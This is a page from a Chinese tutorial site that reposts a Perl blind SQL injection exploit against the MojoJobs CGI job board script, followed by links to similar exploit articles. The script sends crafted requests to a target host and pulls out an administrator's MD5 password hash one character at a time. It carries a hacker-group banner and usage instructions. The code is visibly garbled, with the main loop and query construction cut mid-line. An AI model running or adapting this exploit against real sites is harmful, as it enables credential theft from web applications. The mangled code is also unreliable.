手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoJobs Blind SQL Injection Exploit #n";

print " # (mojoJobs.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit】相关文章:

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

如何保护内网安全

U盘Ripper病毒无法删除的解决方法

IPv6与IPv4的区别 详解

BYOD需要更具时效性的网络安全防护策略

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

黑客技术之slv unpackme 脱壳

什么是360密盘?

DreamNews Manager (id) Remote SQL Injection Vulnerability

精品推荐
分类导航